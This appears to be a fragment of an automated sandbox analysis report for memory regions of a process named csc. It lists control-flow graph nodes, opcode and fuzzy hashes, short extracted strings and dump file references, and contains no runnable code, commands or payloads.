                                                                                                                        • Instruction ID: eb92e6fb49674773e4aac77a6123bf89bdf1693b6299571b377cac879132e314
                                                                                                                        • Opcode Fuzzy Hash: 4caf02b135f1a240821ea95d3c0b7f7fc4452911f483cbf0661e2ab7f72596a6
                                                                                                                        • Instruction Fuzzy Hash: D222FA34A01218CFDB24DF65C994BADB7B6BF48310F148199EA09EB396DB70AD81CF50
                                                                                                                        APIs
                                                                                                                        • KiUserExceptionDispatcher.NTDLL ref: 09481D24
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3788796913.0000000009480000.00000040.00000800.00020000.00000000.sdmp, Offset: 09480000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_9480000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DispatcherExceptionUser
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 6842923-0
                                                                                                                        • Opcode ID: b53fda1f9289b592b6dd3128315d6c190e9e772ad329ef1d687ed343e3643882
                                                                                                                        • Instruction ID: 2b4e174dbdd551696167fa1e1375e9e495a7f200d284526056370086a9caf600
                                                                                                                        • Opcode Fuzzy Hash: b53fda1f9289b592b6dd3128315d6c190e9e772ad329ef1d687ed343e3643882
                                                                                                                        • Instruction Fuzzy Hash: 3B5171387015809FC348EBB9D4A9B7A73E3AB9D351B06507ED94ACB350DE349E81CB51

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 0 95f45e0-95f45fa 2 95f45ff-95f460c 0->2 3 95f45fc 0->3 5 95f460e-95f4614 2->5 6 95f4655 2->6 3->2 7 95f4648-95f4650 5->7 8 95f4616-95f4618 5->8 10 95f465e-95f4666 6->10 9 95f4aa8-95f4aaf 7->9 8->7 11 95f461a-95f4643 8->11 12 95f466f-95f4675 10->12 13 95f4668 10->13 11->9 16 95f48fe-95f490a 12->16 35 95f467b 12->35 13->12 14 95f481e-95f482c 13->14 15 95f46be-95f46d7 13->15 13->16 17 95f477d-95f478b 13->17 18 95f46dc-95f46f5 13->18 19 95f46fa-95f4706 13->19 20 95f48b5-95f48c5 13->20 21 95f4753-95f4763 13->21 22 95f4893-95f4896 13->22 23 95f4831-95f484a 13->23 24 95f4790-95f47b1 13->24 25 95f484f-95f4868 13->25 26 95f47cd-95f47dd 13->26 27 95f486d-95f488e 13->27 28 95f48ca-95f48e4 13->28 29 95f48e9-95f48f9 13->29 30 95f4768-95f4778 13->30 31 95f47e2-95f47fb 13->31 32 95f4682-95f469b 13->32 33 95f4800-95f4819 13->33 34 95f46a0-95f46b9 13->34 14->9 15->9 37 95f490c-95f490e 16->37 38 95f4910-95f4913 16->38 17->9 18->9 41 95f4708-95f473f 19->41 42 95f4744-95f474e 19->42 20->9 21->9 39 95f489f 22->39 40 95f4898-95f489d 22->40 23->9 83 95f47b7-95f47c1 24->83 84 95f47b3-95f47b5 24->84 25->9 26->9 27->9 28->9 29->9 30->9 31->9 32->9 33->9 34->9 35->20 35->22 35->27 35->28 35->29 35->32 60 95f491b-95f491f 37->60 38->60 55 95f48a4-95f48b0 39->55 40->55 41->9 42->9 55->9 66 95f492e-95f4934 60->66 67 95f4921-95f4929 60->67 79 95f493a-95f4952 66->79 80 95f4aa0-95f4aa6 66->80 67->9 88 95f497f-95f4989 79->88 89 95f4954-95f4963 call 95f1bd0 79->89 80->9 86 95f47c3-95f47c8 83->86 84->86 86->9 92 95f498f-95f499a 88->92 93 95f4a62-95f4a66 88->93 89->88 101 95f4965-95f4978 89->101 97 95f499c-95f49a7 92->97 98 95f49aa-95f49b0 92->98 93->80 95 95f4a68-95f4a6d 93->95 99 95f4a6f-95f4a74 95->99 100 95f4a76 95->100 97->98 102 95f49b2-95f49bd 98->102 103 95f49c0-95f49c4 98->103 106 95f4a7b-95f4a9e 99->106 100->106 101->88 107 95f497a 101->107 102->103 104 95f4a2a-95f4a2f 103->104 105 95f49c6-95f49cc 103->105 110 95f4a38 104->110 111 95f4a31-95f4a36 104->111 108 95f49ce-95f49de 105->108 109 95f49e4-95f49ea 105->109 106->9 107->88 108->109 119 95f4ab2-95f4ad2 108->119 112 95f49ec-95f49fb 109->112 113 95f4a0b-95f4a1a 109->113 114 95f4a3d-95f4a60 110->114 111->114 112->113 117 95f49fd-95f4a08 112->117 113->104 118 95f4a1c-95f4a27 113->118 114->9 117->113 118->104 125 95f4ae5-95f4afe 119->125 126 95f4ad4-95f4ae3 119->126 129 95f4b00-95f4b98 125->129 126->129 135 95f4b9a 129->135 136 95f4ba3-95f4baf 129->136 135->136 137 95f4ba1 135->137 140 95f4bb8-95f4bc4 136->140 141 95f4bb1-95f4bb6 136->141 138 95f4c11-95f4c13 137->138 143 95f4bcd-95f4bd9 140->143 144 95f4bc6-95f4bcb 140->144 141->138 146 95f4bdb-95f4be0 143->146 147 95f4be2-95f4bee 143->147 144->138 146->138 149 95f4bf7-95f4c03 147->149 150 95f4bf0-95f4bf5 147->150 152 95f4c0c 149->152 153 95f4c05-95f4c0a 149->153 150->138 152->138 153->138
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: HD'$TC'$h3'$h3'$l0'$p1'$t/'$t/'$t2'$|.'$8'$9'
                                                                                                                        • API String ID: 0-2600670598
                                                                                                                        • Opcode ID: 4eab0f5e9bab0c1718a172c1f64fbf73fedff58599b2fb0b9eac7d4866cbf5d7
                                                                                                                        • Instruction ID: af310080a012e9ba563717de779609faff957a4f02a2ed533fa9fbec27ce1d83
                                                                                                                        • Opcode Fuzzy Hash: 4eab0f5e9bab0c1718a172c1f64fbf73fedff58599b2fb0b9eac7d4866cbf5d7
                                                                                                                        • Instruction Fuzzy Hash: B602C2717042028FDB149F6AD46973EB7E3FFC5360F1544AAE682DB3A2DA34C8418756

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 154 95f67a0-95f67c8 156 95f67ca-95f6811 154->156 157 95f6816-95f6824 154->157 206 95f6c6d-95f6c74 156->206 158 95f6826-95f6831 call 95f3728 157->158 159 95f6833 157->159 160 95f6835-95f683c 158->160 159->160 163 95f6925-95f6929 160->163 164 95f6842-95f6846 160->164 169 95f697f-95f6989 163->169 170 95f692b-95f693a call 95f1bd0 163->170 166 95f684c-95f6850 164->166 167 95f6c75-95f6c9d 164->167 171 95f6862-95f68c0 call 95f3468 call 95f4e50 166->171 172 95f6852-95f685c 166->172 177 95f6ca4-95f6cce 167->177 173 95f698b-95f699a call 95f10d8 169->173 174 95f69c2-95f69e8 169->174 185 95f693e-95f6943 170->185 216 95f68c6-95f6920 171->216 217 95f6d33-95f6d5d 171->217 172->171 172->177 189 95f6cd6-95f6cec 173->189 190 95f69a0-95f69bd 173->190 197 95f69ea-95f69f3 174->197 198 95f69f5 174->198 177->189 191 95f693c 185->191 192 95f6945-95f697a call 95f6268 185->192 214 95f6cf4-95f6d2c 189->214 190->206 191->185 192->206 205 95f69f7-95f6a1f 197->205 198->205 221 95f6a25-95f6a3e 205->221 222 95f6af0-95f6af4 205->222 214->217 216->206 224 95f6d5f-95f6d65 217->224 225 95f6d67-95f6d6d 217->225 221->222 248 95f6a44-95f6a53 call 95f1070 221->248 226 95f6b6e-95f6b78 222->226 227 95f6af6-95f6b0f 222->227 224->225 230 95f6d6e-95f6dab 224->230 231 95f6b7a-95f6b84 226->231 232 95f6bd5-95f6bde 226->232 227->226 254 95f6b11-95f6b20 call 95f1070 227->254 246 95f6b8a-95f6b9c 231->246 247 95f6b86-95f6b88 231->247 234 95f6c16-95f6c63 232->234 235 95f6be0-95f6c0e call 95f2c60 call 95f2c80 232->235 260 95f6c6b 234->260 235->234 249 95f6b9e-95f6ba0 246->249 247->249 262 95f6a6b-95f6a80 248->262 263 95f6a55-95f6a5b 248->263 258 95f6bce-95f6bd3 249->258 259 95f6ba2-95f6ba6 249->259 276 95f6b38-95f6b43 254->276 277 95f6b22-95f6b28 254->277 258->231 258->232 265 95f6ba8-95f6bc1 259->265 266 95f6bc4-95f6bc7 259->266 260->206 274 95f6ab4-95f6abd 262->274 275 95f6a82-95f6aae call 95f1da0 262->275 270 95f6a5f-95f6a61 263->270 271 95f6a5d 263->271 265->266 266->258 270->262 271->262 274->217 284 95f6ac3-95f6aea 274->284 275->214 275->274 276->217 280 95f6b49-95f6b6c 276->280 278 95f6b2c-95f6b2e 277->278 279 95f6b2a 277->279 278->276 279->276 280->226 280->254 284->222 284->248
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: <V'$~{%$~{%
                                                                                                                        • API String ID: 0-2908653633
                                                                                                                        • Opcode ID: d1fec78c10ef65408d855dadc94842f8e2a9faf44dbf639abb9c3c60f15d77a9
                                                                                                                        • Instruction ID: 2e34164cd57890d989561ea661407da173c7af5f2e982733342109b04aaa2efc
                                                                                                                        • Opcode Fuzzy Hash: d1fec78c10ef65408d855dadc94842f8e2a9faf44dbf639abb9c3c60f15d77a9
                                                                                                                        • Instruction Fuzzy Hash: 52127A30A01608DFCB24DFA6C4A4A6EB7F2FF88710F148569E546EB355DB35AC46CB90

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 295 95fdd68-95fdd88 296 95fdd8e-95fdd92 295->296 297 95fdea1-95fdec6 295->297 298 95fdecd-95fdef2 296->298 299 95fdd98-95fdda1 296->299 297->298 300 95fdef9-95fdf2f 298->300 299->300 301 95fdda7-95fddce 299->301 317 95fdf36-95fdf8c 300->317 312 95fde96-95fdea0 301->312 313 95fddd4-95fddd6 301->313 315 95fddd8-95fdddb 313->315 316 95fddf7-95fddf9 313->316 315->317 318 95fdde1-95fddeb 315->318 319 95fddfc-95fde00 316->319 333 95fdf8e-95fdfa2 317->333 334 95fdfb0-95fdfc7 317->334 318->317 321 95fddf1-95fddf5 318->321 322 95fde02-95fde11 319->322 323 95fde61-95fde6d 319->323 321->316 321->319 322->317 328 95fde17-95fde5e 322->328 323->317 324 95fde73-95fde90 323->324 324->312 324->313 328->323 411 95fdfa5 call 95fe5e8 333->411 412 95fdfa5 call 95fe488 333->412 413 95fdfa5 call 95fe482 333->413 414 95fdfa5 call 95fe560 333->414 343 95fdfcd-95fe0b2 call 95f7e68 call 95f7870 call 95fcf70 call 95f7870 call 95f7ea8 call 95fbef8 call 95f7870 call 95fa758 call 95f8710 334->343 344 95fe0b7-95fe0c7 334->344 339 95fdfab 341 95fe1d9-95fe1e4 339->341 353 95fe1e6-95fe1f6 341->353 354 95fe213-95fe234 call 95f7fb8 341->354 343->344 351 95fe0cd-95fe1a6 call 95f7e68 * 2 call 95f8620 call 95f7870 call 95fcf70 call 95f7870 call 95f7b20 call 95f7fb8 call 95f7870 344->351 352 95fe1b4-95fe1d0 call 95f7870 344->352 408 95fe1a8 351->408 409 95fe1b1 351->409 352->341 364 95fe1f8-95fe1fe 353->364 365 95fe206-95fe20e call 95f8710 353->365 364->365 365->354 408->409 409->352 411->339 412->339 413->339 414->339
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: <5'$<5'$l`'
                                                                                                                        • API String ID: 0-2648597921
                                                                                                                        • Opcode ID: 727fe84a0b82aecddae331b97e2d4e559cb566fb73c68a68b96dd9531687fe2c
                                                                                                                        • Instruction ID: 6837c04bc2c996ef5424445aae8578e2d2fc6b547ee45b98231dfab2befea186
                                                                                                                        • Opcode Fuzzy Hash: 727fe84a0b82aecddae331b97e2d4e559cb566fb73c68a68b96dd9531687fe2c
                                                                                                                        • Instruction Fuzzy Hash: 44E13134A01209DFCB04EFA5D494A9DB7B2FFC9310F118569E906AB3A4DB34ED46CB91

                                                                                                                        Control-flow Graph

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: @r'$l`'$l`'
                                                                                                                        • API String ID: 0-4063128814
                                                                                                                        • Opcode ID: 40ce038e4d6a07451297042d0b89795fedbca99843b9f741290d4eb31a9156ec
                                                                                                                        • Instruction ID: e76035c0392cf8016d12f3c59a99a84faceadeeed83ab6763bcab69ebd4f077d
                                                                                                                        • Opcode Fuzzy Hash: 40ce038e4d6a07451297042d0b89795fedbca99843b9f741290d4eb31a9156ec
                                                                                                                        • Instruction Fuzzy Hash: F6C1C575A00618CFCB04DFA5D9A4E9EB7B6FF89310F104169E506EB3A4DB71AC42CB51

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 505 95f74d2-95f7527 523 95f7529 call 95f7668 505->523 524 95f7529 call 95f7642 505->524 509 95f752f-95f754a 521 95f754d call 95f7c30 509->521 522 95f754d call 95f7c20 509->522 512 95f7553-95f75aa 516 95f75ac-95f75b2 512->516 517 95f75c2-95f7635 512->517 518 95f75b6-95f75b8 516->518 519 95f75b4 516->519 518->517 519->517 521->512 522->512 523->509 524->509
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: x^'$x^'$x^'
                                                                                                                        • API String ID: 0-3548421634
                                                                                                                        • Opcode ID: 0dc6d17a4c00be60f74eb43b697c832ea6ce4150414b077ff25fbe5dc4304a8f
                                                                                                                        • Instruction ID: 8b58b081e04a4d8fdc4f1bbab95823a1ca95b7918fe154768c76633854aaf633
                                                                                                                        • Opcode Fuzzy Hash: 0dc6d17a4c00be60f74eb43b697c832ea6ce4150414b077ff25fbe5dc4304a8f
                                                                                                                        • Instruction Fuzzy Hash: 8D314F36600204DFDF099F64D858E69BBB2FF89310F1544A9FA06AB361DA71DC51CB91

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1104 95f5e50-95f5e62 1105 95f5e8c-95f5e90 1104->1105 1106 95f5e64-95f5e85 1104->1106 1107 95f5e9c-95f5eab 1105->1107 1108 95f5e92-95f5e94 1105->1108 1106->1105 1110 95f5ead 1107->1110 1111 95f5eb7-95f5ee3 1107->1111 1108->1107 1110->1111 1114 95f5ee9-95f5eef 1111->1114 1115 95f6110-95f6125 1111->1115 1116 95f5ef5-95f5efb 1114->1116 1117 95f5fc1-95f5fc5 1114->1117 1128 95f60cd-95f60d9 1115->1128 1129 95f6127-95f6157 1115->1129 1116->1115 1119 95f5f01-95f5f0e 1116->1119 1120 95f5fe8-95f5ff1 1117->1120 1121 95f5fc7-95f5fd0 1117->1121 1123 95f5f14-95f5f1d 1119->1123 1124 95f5fa0-95f5fa9 1119->1124 1126 95f6016-95f6019 1120->1126 1127 95f5ff3-95f6013 1120->1127 1121->1115 1125 95f5fd6-95f5fe6 1121->1125 1123->1115 1134 95f5f23-95f5f3b 1123->1134 1124->1115 1133 95f5faf-95f5fbb 1124->1133 1130 95f601c-95f6022 1125->1130 1126->1130 1127->1126 1131 95f60db 1128->1131 1132 95f60e5-95f60fe 1128->1132 1153 95f616d-95f6179 1129->1153 1154 95f6159 1129->1154 1130->1115 1136 95f6028-95f603b 1130->1136 1131->1132 1156 95f6106-95f610d 1132->1156 1133->1116 1133->1117 1137 95f5f3d 1134->1137 1138 95f5f47-95f5f59 1134->1138 1136->1115 1140 95f6041-95f6051 1136->1140 1137->1138 1138->1124 1148 95f5f5b-95f5f61 1138->1148 1140->1115 1143 95f6057-95f6064 1140->1143 1143->1115 1146 95f606a-95f607f 1143->1146 1146->1115 1158 95f6085-95f60a8 1146->1158 1150 95f5f6d-95f5f73 1148->1150 1151 95f5f63 1148->1151 1150->1115 1152 95f5f79-95f5f9d 1150->1152 1151->1150 1159 95f617b 1153->1159 1160 95f6185-95f61a1 1153->1160 1157 95f615c-95f615e 1154->1157 1162 95f61a2-95f61a9 1157->1162 1163 95f6160-95f616b 1157->1163 1158->1115 1167 95f60aa-95f60b5 1158->1167 1159->1160 1169 95f61ab-95f61b1 1162->1169 1170 95f61d0-95f61d7 1162->1170 1163->1153 1163->1157 1167->1156 1171 95f60b7-95f60c1 1167->1171 1172 95f61d8-95f61d9 1169->1172 1173 95f61b3-95f61cf call 95f1070 1169->1173 1170->1172 1174 95f61db-95f61dd 1170->1174 1171->1156 1179 95f60c3-95f60cb 1171->1179 1176 95f61e7-95f61e9 1172->1176 1173->1170 1173->1176 1174->1176 1194 95f61eb call 95f740f 1176->1194 1195 95f61eb call 95f6258 1176->1195 1196 95f61eb call 95f6268 1176->1196 1179->1128 1180 95f61f1-95f61f5 1181 95f61f7-95f620e 1180->1181 1182 95f6240-95f6250 1180->1182 1181->1182 1187 95f6210-95f621a 1181->1187 1189 95f622d-95f623d 1187->1189 1190 95f621c-95f622b 1187->1190 1190->1189 1194->1180 1195->1180 1196->1180
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: d$y%
                                                                                                                        • API String ID: 0-1338975589
                                                                                                                        • Opcode ID: 972c2d094fd61266985376a9bc8d3a1a2c48c2215a6ead6adb3e0a0f7faa3e27
                                                                                                                        • Instruction ID: 8f5f87c710f43461909ca17d2df97e57500e7ca858923ffdc01bdedf588bcc72
                                                                                                                        • Opcode Fuzzy Hash: 972c2d094fd61266985376a9bc8d3a1a2c48c2215a6ead6adb3e0a0f7faa3e27
                                                                                                                        • Instruction Fuzzy Hash: D9D18C34601605CFCB14CF29C494A6AB7F6FF88321B258969E55ACB762DB30FC42CB90

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1197 95f9620-95f9626 1198 95f962f-95f9633 1197->1198 1199 95f963e-95f9653 1198->1199 1200 95f9635-95f963b 1198->1200 1202 95f979f-95f97ec 1199->1202 1203 95f9659-95f972c call 95f1da0 1199->1203 1200->1199 1204 95f97ee-95f984e 1202->1204 1205 95f9850-95f9897 1202->1205 1219 95f92a6-95f92ad 1203->1219 1220 95f9732-95f9746 1203->1220 1207 95f989d-95f98ed 1204->1207 1205->1207 1263 95f98f3 call 95f9a40 1207->1263 1264 95f98f3 call 95f9a10 1207->1264 1210 95f98f9 1212 95f995e-95f9973 1210->1212 1217 95f934a-95f94c9 1212->1217 1218 95f9979-95f999a 1212->1218 1217->1197 1225 95f99a1-95f99b4 call 95f1cf0 1218->1225 1221 95f932f-95f9345 1219->1221 1222 95f92b3-95f92c8 1219->1222 1220->1219 1221->1225 1222->1212 1232 95f92ce-95f92fe 1222->1232 1235 95f99b5 1225->1235 1240 95f930c-95f932d 1232->1240 1241 95f9300-95f930a 1232->1241 1235->1235 1240->1221 1241->1221 1241->1240 1263->1210 1264->1210
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: (l'$h'
                                                                                                                        • API String ID: 0-560915138
                                                                                                                        • Opcode ID: 63ef233dfaf738a5f9e8d7e112eaa7eb5bfcb93c55a6a708fd6182205b4aa418
                                                                                                                        • Instruction ID: 5b819f7a58ece307b30f1120c8f05fb9a37e5270aa2050ba8b6a9052ec09c959
                                                                                                                        • Opcode Fuzzy Hash: 63ef233dfaf738a5f9e8d7e112eaa7eb5bfcb93c55a6a708fd6182205b4aa418
                                                                                                                        • Instruction Fuzzy Hash: 48E1E0B5A002288FCB64DF69C994B9DBBF2BB88310F1441E9E549E7351DB309E85CF61

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1265 95f3468-95f3482 1266 95f348e-95f349a 1265->1266 1267 95f3484-95f348b 1265->1267 1269 95f349c-95f34a9 1266->1269 1270 95f34f6-95f34f9 1266->1270 1279 95f34af-95f34df 1269->1279 1280 95f36c7-95f36ff 1269->1280 1271 95f350c-95f350f 1270->1271 1272 95f34fb-95f34fd 1270->1272 1273 95f3535-95f3538 1271->1273 1274 95f3511-95f352f 1271->1274 1278 95f3505 1272->1278 1276 95f353e-95f3544 1273->1276 1277 95f36bd-95f36c4 1273->1277 1274->1273 1284 95f3706-95f3727 1274->1284 1276->1277 1282 95f354a-95f3553 1276->1282 1278->1271 1306 95f34ec-95f34ef 1279->1306 1307 95f34e1-95f34ea 1279->1307 1280->1284 1289 95f358b-95f3591 1282->1289 1290 95f3555-95f3564 1282->1290 1292 95f369c-95f36a2 1289->1292 1293 95f3597-95f35a0 1289->1293 1290->1289 1300 95f3566-95f357f 1290->1300 1292->1277 1298 95f36a4-95f36b4 1292->1298 1293->1292 1302 95f35a6-95f35b2 1293->1302 1298->1277 1305 95f36b6-95f36bb 1298->1305 1300->1289 1310 95f3581-95f3584 1300->1310 1311 95f35b8-95f35e0 1302->1311 1312 95f3650-95f3694 1302->1312 1305->1277 1306->1270 1307->1270 1310->1289 1311->1312 1319 95f35e2-95f361f 1311->1319 1312->1292 1319->1312 1326 95f3621-95f364e 1319->1326 1326->1292
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: zh_$zh_
                                                                                                                        • API String ID: 0-1088455910
                                                                                                                        • Opcode ID: 892bdb23e9e3d66f37d1b6e1c8f8451e9eaf141d683f68258e4d6fdb71954664
                                                                                                                        • Instruction ID: 361bef4b135f342f0d0c79c2b403421fa2cd843deb4c55344896b11d62d0952c
                                                                                                                        • Opcode Fuzzy Hash: 892bdb23e9e3d66f37d1b6e1c8f8451e9eaf141d683f68258e4d6fdb71954664
                                                                                                                        • Instruction Fuzzy Hash: C3910470B006148FEB18DF29C894AAA7BF6BF89750B1540A9E505DF3B1DB70EC41CBA1

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1331 95fea60-95fea8e 1332 95feaaa-95feac2 call 95f8580 1331->1332 1333 95fea90-95feaa8 call 95f8620 1331->1333 1340 95feac4-95feacb 1332->1340 1333->1340 1341 95feaee-95feaf3 1340->1341 1342 95feacd-95fead1 1340->1342 1344 95feb1d-95feb27 1341->1344 1342->1341 1343 95fead3-95feaec 1342->1343 1343->1341 1359 95feaf5-95feb1a call 95f8620 1343->1359 1345 95feb3e-95feb42 1344->1345 1346 95feb29-95feb3c call 95f8710 1344->1346 1348 95feb5f-95feb63 1345->1348 1349 95feb44-95feb48 1345->1349 1346->1348 1350 95febbd-95febea call 95fed48 1348->1350 1351 95feb65-95febb8 call 95f7870 call 95f7e68 call 95f7ea8 call 95fe488 call 95f8710 1348->1351 1349->1348 1353 95feb4a-95feb57 call 95f7870 1349->1353 1369 95febf0-95febf4 1350->1369 1351->1350 1353->1348 1363 95feb5a call 95f8710 1353->1363 1359->1344 1363->1348 1372 95fecbc-95feccf 1369->1372 1373 95febfa-95febfe 1369->1373 1380 95fecd1-95fecd5 1372->1380 1376 95fec04-95fec08 1373->1376 1377 95fecb1-95fecb7 call 95f7870 1373->1377 1376->1377 1381 95fec0e-95fecaf call 95f7870 * 2 call 95f7e68 * 2 call 95fae50 call 95f7870 call 95f7fb8 1376->1381 1377->1372 1383 95fecd7 1380->1383 1384 95fece0 1380->1384 1381->1380 1383->1384 1389 95fece1 1384->1389 1389->1389
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: l`'$l`'
                                                                                                                        • API String ID: 0-266309857
                                                                                                                        • Opcode ID: cd684898729a48c892baf78492692b36eb0ab25fae9d4cb42a33215511f9e4f1
                                                                                                                        • Instruction ID: 0996706b97c3a3847cc14104fb0617b1adc00cc8a0b92155b074f86462487b5f
                                                                                                                        • Opcode Fuzzy Hash: cd684898729a48c892baf78492692b36eb0ab25fae9d4cb42a33215511f9e4f1
                                                                                                                        • Instruction Fuzzy Hash: 23814C34B006058FCB14EF69C465B9DB7B2BF88710F10856AE602DB3B4CB75AD4ACB90

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1406 95f9a40-95f9a4c 1407 95f9a4e-95f9a5e 1406->1407 1408 95f9aa8-95f9b0b 1406->1408 1411 95f9a8f-95f9aa7 1407->1411 1412 95f9a60-95f9a6c 1407->1412 1421 95f9b0d-95f9b30 call 95f53d0 1408->1421 1422 95f9b87-95f9bb8 call 95f9bd1 1408->1422 1417 95f9a6e-95f9a84 1412->1417 1418 95f9a85-95f9a8e 1412->1418 1421->1422 1426 95f9b32-95f9b84 1421->1426 1427 95f9bbe-95f9bc7 1422->1427
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: HK'$|L'
                                                                                                                        • API String ID: 0-361813333
                                                                                                                        • Opcode ID: e3df04bec4f27ff4b670368a33f26d4f14f27847d6185a7bbdac94c3d324f42d
                                                                                                                        • Instruction ID: 531630c2bec1c184fec95ac7e67b85b61a98474b04ba7c190cca7e67c90bc25c
                                                                                                                        • Opcode Fuzzy Hash: e3df04bec4f27ff4b670368a33f26d4f14f27847d6185a7bbdac94c3d324f42d
                                                                                                                        • Instruction Fuzzy Hash: 9441B5327041596FCF019EEA9C509FFBFEAEF89210B04406BFA45E3251CA35CD259BA0

                                                                                                                        Control-flow Graph

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: %tY$l`'
                                                                                                                        • API String ID: 0-2902025712
                                                                                                                        • Opcode ID: d1e93b8fe9fa215e5606191d9a620bf687043c2a9a83f15a217739c8f0ae732e
                                                                                                                        • Instruction ID: 5d570f3d356bd784b06c2334e5ade0e9b379caebf072bddd03c0a691851581ca
                                                                                                                        • Opcode Fuzzy Hash: d1e93b8fe9fa215e5606191d9a620bf687043c2a9a83f15a217739c8f0ae732e
                                                                                                                        • Instruction Fuzzy Hash: EE415E30B106158FCB04AB69C864B6EB7B6BFC9710F10951AE607EB3A4DF749C06CB91

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
